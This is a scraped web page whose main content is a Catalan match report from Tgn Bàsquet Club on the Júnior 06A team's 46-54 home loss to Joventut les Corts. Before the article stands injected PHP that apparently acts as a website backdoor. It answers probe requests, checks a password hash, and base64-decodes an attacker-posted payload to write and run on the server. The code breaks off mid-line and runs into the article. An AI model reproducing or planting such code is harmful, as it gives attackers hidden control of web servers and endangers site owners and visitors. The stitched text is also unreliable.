function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Júnior 06A planta cara al líder (46-54) - Tgn Bàsquet Club -

El Júnior 06A planta cara al líder (46-54)

Updated: febrer 23, 2024

El Júnior 06A va caure davant de l’invicte de la fase, el Joventut les Corts (46-54)

El Júnior 06 A va perdre a casa l’oportunitat de plantar cara a les primeres del grup, el Joventut les Corts. El partit va començar molt igualat, però una desconnexió cap al final del quart fa que les liles encaixin un parcial de 0-9 en 2 minuts. Durant el segon quart la defensa de les tarragonines millora i aconsegueixen fer molts contraatacs, tot i això, la diferència en el marcador és de 4 punts.
Després de la mitja part les locals surten a pista amb ganes d’endur-se la victòria i a partir d’una bona defensa construeixen bones i treballades opcions de cistella, acabant el quart 39-40. Una cosa que va perjudicar les del TGN van ser les faltes, ja que les visitants van arribar a fer fins a 22 punts en tirs lliures. En l’últim període les liles perden verticalitat a cistella i no poden aturar les ofensives rivals.

Les noies entrenades per Font van tenir la victòria a tocar i es valora l’esforç que van fer durant tot matx.